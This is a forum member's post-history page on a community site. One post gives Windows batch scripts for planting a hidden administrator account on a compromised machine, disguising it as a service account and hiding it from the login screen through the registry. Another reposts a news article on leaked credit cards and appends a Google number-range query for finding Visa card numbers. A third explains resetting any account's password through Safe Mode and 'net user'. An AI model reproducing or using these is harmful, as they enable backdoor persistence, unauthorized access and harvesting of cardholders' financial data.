Jump to content
xisto Community

RemoteConnection

Members
 View Profile  See their activity

  • Content Count

    109

  • Joined

  • Last visited

Posts posted by RemoteConnection

  6. Posted · Report reply

    when u have an access to a windows system by CMD , maybe u need to create an admin account with a remote cnnection,here's the way:

    @echo offnet user IUSR_WAN /add /expires:nevernet localgroup administrators /add IUSR_REMOTEnet user IUSR_WAN hermannet user IUSR_WAN /comment:"Built-in account for Remote Service"net user IUSR_WAN /fullname:"Remote Service Account"

    also another way that the user won't show on login screen!
    @echo offnet user illwill password /add && net localgroup administrators illwill /addecho Windows Registry Editor Version 5.00> c:\hide.regecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.regecho "illwill"=dword:00000000>> c:\hide.regREGEDIT /S c:\hide.REGDEL /Q c:\hide.REGExit

  9. Posted · Report reply

    Source: ZDNet
    Simple queries using the Google search engine can turn up a handful of sites that have posted credit card information to the Web, CNET News.com learned on Tuesday.

    The lists of financial information include hundreds of card holders' names, addresses and phone numbers as well as their credit-card data. Much of the credit-card data that appears in the lists found by Google may no longer be valid, but CNET called several people listed and verified that the credit cards numbers were authentic. The query, the latest example of "Google hacking," highlights increasing concern that knowledgeable Web surfers can turn up sensitive information by mining the world's best-known search engine.

    "It seems like everyone has their own trick," said Chris Wysopal, vice president of research and development for digital security firm @Stake. "This is really searching for data that should be secret but has been exposed through either through misconfiguration or by someone who has stolen it."

    There is no shortage of ways to search Google to find such data. Whole sites spell out how to search for financial information and describe software vulnerabilities and vulnerable configurations on Internet machines. Google is the tool of choice because its powerful search options, such as the ability to search for a range of numbers--useful in finding credit card data--is not present in other company's search engines.

    Google would not comment, citing the quiet period before the company's initial public offering. However, a company source did say that the search firm has a tool for Web masters to remove pages from the archive, if they find that parts of their site violate laws or regulations. Moreover, the company has decided to allow anyone to request the removal from search results of any document that includes a Social Security or credit card number--a note to help@google.com with a link to the page will suffice, the source said.

    Keith Ernst--a Durham, N.C., resident and, ironically, a worker at a financial antifraud company--found himself on the receiving end of a data leak earlier this year that resulted in his debit-card number being posted on such a list. Before Ernst canceled his card, the number had been used for a variety of charges. A foreign student had attempted to pay college tuition with the stolen number.

    "It was very unsettling to see those charges come up on your account," said Ernst, who normally works to prevent fraud from happening to others. "It was interesting, to say the least, to be on the other side of the issue."

    Ernst's information is now posted to an Arabic bulletin board with more than a hundred other people's financial records, at the beck and call of a simple search on Google. His credit union refunded the charges and now he only uses credit cards to make Internet purchases, because fraudulent charges using a credit card are not immediately debited from his bank account.

    The FBI could not immediately comment on whether the agency was investigating the sites listing financial information. The sites seemed to be spread out over the globe: One had a Russian domain name, another was written in Arabic, and a third was based in the Netherlands.

    Good guys can Google, too
    The rise of such Web sites has convinced @Stake's Wysopal that major credit issuers should start using Google as a security tool, searching for vulnerabilities and leaked information before other, potentially malicious, people find the data.

    "Shouldn't Visa be proactive and do these searches on a daily basis?" he asked. "The bad guys are doing it, so why aren't the good guys doing it and beating them to the punch?"

    The sentiments echoed statements made at the Black Hat Security Briefings in Las Vegas last week, where security researchers and hackers were surprised to learn the extent to which Google can pinpoint weakly secured servers and databases.

    Visa already has many sources to pinpoint fraud, said Rosetta Jones, a spokeswoman for the company.

    "When we run them against a database, it is very common to find that, in most cases, we have known that the credit card was stolen," she said.

    While the company may not use Google to track when sites containing credit-card information appear, it has moved to have many such sites taken down when tipped off to the situation. So far this year, Visa has had 20 sites pulled from the Web for trafficking in stolen credit cards.

    One big haystack
    With 4 billion Web pages on the Internet, Google is not able to police its archives very effectively, a source at the company said. The firm has legally positioned itself as an intermediary of content beyond its control, which releases it from being held responsible for any content the company archives or to which it links.

    That means consumers are left to carefully watch their information. Yet, the degree to which fraud has become more common makes consumers like Ernst fatalistic.

    "I am sure that the information is out there," the fraud-fighter said.


    An Example :

    Try googling:
    visa 4356000000000000..4356999999999999

    For example. Not saying this is the only way to find these, but it certainly is an interesting application of Google.


  11. Posted · Report reply

    STEPS TO CHANGE/RESET PASSWORD FOR ANY USERNAME 1. Reboot the computer 2. Right after the bios is finished, hit F8 (or F2,10,12) 3. Select 'Safe mode' or 'Safe mode with networking support' 4. Windows will boot up to the logon screen. Click administrator, 9/10 there is no password. 5. Do, Start->Run->type 'command' 6. At the prompt, type 'net user' which will display a list of usernames. Find the one you are looking for, try 'net user username' for them all. Type 'net user /HELP' for more info. 7. To reset the password type 'net user username *' where username is the username you want to reset. 8. For no password, leave blank. 9. Now, reboot and you can login as that user.STEPS TO PROTECT YOURSELF FROM THIS METHOD 1. Log into your account (must have admin rights) 2. Get to a command prompt and type 'net user username *' where username is Administrator, or the renamed administrator account. 3. Give administrator a STRONG password. 4. Done.

×
×
  • Create New...

Important Information

Terms of Use | Privacy Policy | Guidelines | We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.

  I accept